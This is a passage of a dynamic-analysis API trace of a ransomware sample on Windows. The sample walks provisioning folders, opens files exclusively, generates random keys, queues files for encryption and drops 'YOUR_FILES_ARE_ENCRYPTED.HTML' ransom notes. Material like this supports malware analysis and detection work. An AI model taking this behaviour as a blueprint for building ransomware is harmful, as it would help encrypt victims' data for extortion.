1 [0106.966] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.966] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml") returned 100 [0106.966] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0106.966] lstrlenW (lpString=".xml") returned 4 [0106.966] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0106.966] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.966] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0106.967] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=271) returned 1 [0106.967] CloseHandle (hObject=0x314) returned 1 [0106.967] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 1 [0106.967] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.967] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov") returned 85 [0106.967] GetProcessHeap () returned 0x600000 [0106.967] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0106.981] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov" [0106.981] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*" [0106.981] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0106.982] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0106.982] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime", cAlternateFileName="")) returned 1 [0106.982] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.982] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime") returned 93 [0106.982] GetProcessHeap () returned 0x600000 [0106.982] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.983] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime" [0106.983] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*" [0106.983] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0106.983] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="..", cAlternateFileName="")) returned 1 [0106.984] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c2408e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0c2408e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0c4a301, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0106.984] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.984] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml") returned 109 [0106.984] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0106.984] lstrlenW (lpString=".provxml") returned 8 [0106.984] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0106.984] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c2408e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0c2408e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0c4a301, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0 [0106.984] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0106.984] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0106.984] GetProcessHeap () returned 0x600000 [0106.984] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315c020 [0106.984] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0106.985] WriteFile (in: hFile=0x31c, lpBuffer=0x315c020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x315c020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0106.986] CloseHandle (hObject=0x31c) returned 1 [0106.986] GetProcessHeap () returned 0x600000 [0106.986] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315c020 | out: hHeap=0x600000) returned 1 [0106.986] GetProcessHeap () returned 0x600000 [0106.986] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.987] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c7056c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0c7056c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0c7056c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0106.987] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.987] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml") returned 97 [0106.987] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0106.987] lstrlenW (lpString=".xml") returned 4 [0106.987] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0106.987] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.987] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0106.987] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=348) returned 1 [0106.988] CloseHandle (hObject=0x31c) returned 1 [0106.988] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c7056c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0c7056c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0c7056c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0106.988] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0106.988] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0106.988] GetProcessHeap () returned 0x600000 [0106.988] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0106.988] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0106.988] WriteFile (in: hFile=0x32c, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.989] CloseHandle (hObject=0x32c) returned 1 [0106.990] GetProcessHeap () returned 0x600000 [0106.990] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0106.990] GetProcessHeap () returned 0x600000 [0106.990] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0106.990] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 0 [0106.990] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.990] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0106.990] GetProcessHeap () returned 0x600000 [0106.990] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0106.991] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.991] WriteFile (in: hFile=0x308, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.992] CloseHandle (hObject=0x308) returned 1 [0106.992] GetProcessHeap () returned 0x600000 [0106.992] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0106.992] GetProcessHeap () returned 0x600000 [0106.992] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0106.993] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{9aec5bda-1e87-46b3-bb96-1a01c606555e}", cAlternateFileName="{9AEC5~1")) returned 1 [0106.994] StrStrIW (lpFirst="{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.994] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}") returned 80 [0106.994] GetProcessHeap () returned 0x600000 [0106.994] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0106.994] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}" [0106.994] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*" [0106.995] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0106.996] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.996] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1c88c62, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1c88c62, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1c88c62, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1cac, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0106.996] StrStrIW (lpFirst="customizations.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.996] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml") returned 99 [0106.996] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0106.996] lstrlenW (lpString=".xml") returned 4 [0106.996] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0106.996] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.996] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0106.997] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=7340) returned 1 [0106.997] GetProcessHeap () returned 0x600000 [0106.997] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0106.999] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="74") returned 2 [0106.999] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="70") returned 2 [0106.999] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="2A") returned 2 [0106.999] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="6D") returned 2 [0106.999] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="3C") returned 2 [0106.999] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="C5") returned 2 [0106.999] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="BF") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="E6") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="5E") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="66") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="CB") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="9F") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="9A") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="1D") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="8F") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="10") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="61") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="A3") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="00") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="44") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="75") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="2F") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="CF") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="D1") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="E4") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="3E") returned 2 [0106.999] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="B8") returned 2 [0107.000] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="84") returned 2 [0107.000] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="3A") returned 2 [0107.000] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="3D") returned 2 [0107.000] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="4F") returned 2 [0107.000] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="7B") returned 2 [0107.000] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" [0107.000] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.000] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0107.000] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a2656d, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a2656d, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a2656d, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0107.000] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.000] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: 